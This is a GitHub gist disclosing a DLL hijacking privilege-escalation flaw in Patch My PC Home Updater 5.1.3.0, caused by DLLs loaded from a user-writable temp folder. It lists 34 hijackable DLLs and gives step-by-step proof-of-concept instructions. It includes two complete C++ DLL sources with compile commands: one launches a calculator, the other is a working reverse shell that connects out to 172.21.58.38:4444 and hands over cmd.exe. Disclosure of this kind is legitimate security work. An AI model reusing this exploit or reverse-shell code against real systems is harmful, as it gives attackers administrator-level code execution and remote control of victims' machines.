Skip to content

Instantly share code, notes, and snippets.

@shellkraft

shellkraft/patch.md Secret

Last active April 23, 2025 12:25
Show Gist options
  • Save shellkraft/d7db265b53115d52a4ca5bffe5e9c6e4 to your computer and use it in GitHub Desktop.
Save shellkraft/d7db265b53115d52a4ca5bffe5e9c6e4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
patch.md

DLL Hijacking in Patch My PC Home Updater (v5.1.3.0)

Product: Patch My PC Home Updater
Version Affected: 5.1.3.0 and prior
Platform: Windows 10 / 11 (x64)

Summary

Patch My PC Home Updater (v5.1.3.0 and earlier) is vulnerable to multiple DLL hijacking flaws, where missing DLLs are loaded from a user-writeable directory %TEMP% without validation.

The application launches with elevated Administrator privileges (via UAC prompt). As a result, any malicious DLL placed in these locations by a standard user will be executed with Administrator rights upon application launch.

This allows a local attacker to reliably achieve arbitrary code execution as Administrator, leading to a critical local privilege escalation scenario.

Technical Details

Upon execution, Patch My PC Home Updater prompts for elevation via UAC and runs with High Integrity as a member of the Administrators group.

Once elevated, it extracts .NET runtime files into a user-writeable directory under:

%LOCALAPPDATA%\Temp\.net\PatchMyPC-HomeUpdater\SbL2KoWrF_hOa3+ItFVOhBm9mPo2SBA=\

The application then attempts to load several DLLs from its current working directory. If any expected DLLs (e.g., kernel32.dll, WindowsCodecsExt.dll, uxtheme.dll, wininet.dll) are missing, and an attacker pre-places a malicious version in this folder, it will be loaded and executed automatically and with Administrator-level privileges.

This flaw enables a standard user to execute code in an elevated context, bypassing the intended UAC protection mechanism.

Affected Components

1. advapi32.dll
2. BCrypt.dll
3. comctl32.dll
4. crypt32.dll
5. dwmapi.dll
6. gdi32.dll
7. gdiplus.dll
8. imm32.dll
9. iphlpapi.dll
10. kernel32.dll
11. mscms.dll
12. msctf.dll
13. ntdll.dll
14. ole32.dll
15. oleaut32.dll
16. PresentationNative_cor3.dll
17. secur32.dll
18. shcore.dll
19. shell32.dll
20. sspicli.dll
21. System.IO.Compression.Native.dll
22. ucrtbase.dll
23. urlmon.dll
24. user32.dll
25. uxtheme.dll
26. vcruntime140_cor3.dll
27. WindowsCodecs.dll
28. WindowsCodecsExt.dll
29. winhttp.dll
30. Wininet.dll
31. wpfgfx_cor3.dll
32. ws2_32.dll
33. wtsapi32.dll
34. UIAutomationCore.dll

Proof of Concept

  1. Create a malicious DLL named comctl32.dll that launches calc.exe or spawns a reverse shell.
  2. Place it in the following folder before the application starts: 
    %LOCALAPPDATA%\Temp\.net\PatchMyPC-HomeUpdater\SbL2KoWrF_hOa3+ItFVOhBm9mPo2SBA=\
  3. Launch Patch My PC Home Updater.
  4. Observe execution of the malicious code (e.g., calc.exe or shell).

Demo (Calculator):

// Tested in Win10
// x86_64-w64-mingw32-g++ -shared --static -o hijack.dll hijack.cpp

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:
            WinExec("calc.exe", 0); //This doesn't accept redirections like system
            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

Demo RCE

// x86_64-w64-mingw32-g++ -shared -o patchpoc.dll patchpoc.cpp -lws2_32 -static

#include <winsock2.h>  
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

DWORD WINAPI ReverseShell(LPVOID lpParam) {
    WSADATA wsaData;
    SOCKET sock;
    struct sockaddr_in server;

    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    // Change IP and port
    const char *ip = "172.21.58.38";
    int port = 4444;

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);  // 6 args now

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip);

    if (WSAConnect(sock, (SOCKADDR*)&server, sizeof(server), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;

    ZeroMemory(&pi, sizeof(pi));
    CreateProcess(NULL, (LPSTR)"cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(sock);
    WSACleanup();
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        CreateThread(NULL, 0, ReverseShell, NULL, 0, NULL);
    }
    return TRUE;
}

Impact

  • Arbitrary code execution as Administrator, leading to a local privilege escalation.

CVSS v3.1 Score

Vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base Score: 8.8 / 10 (High)

@shellkraft
Copy link
Author

patchmypc.mp4

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment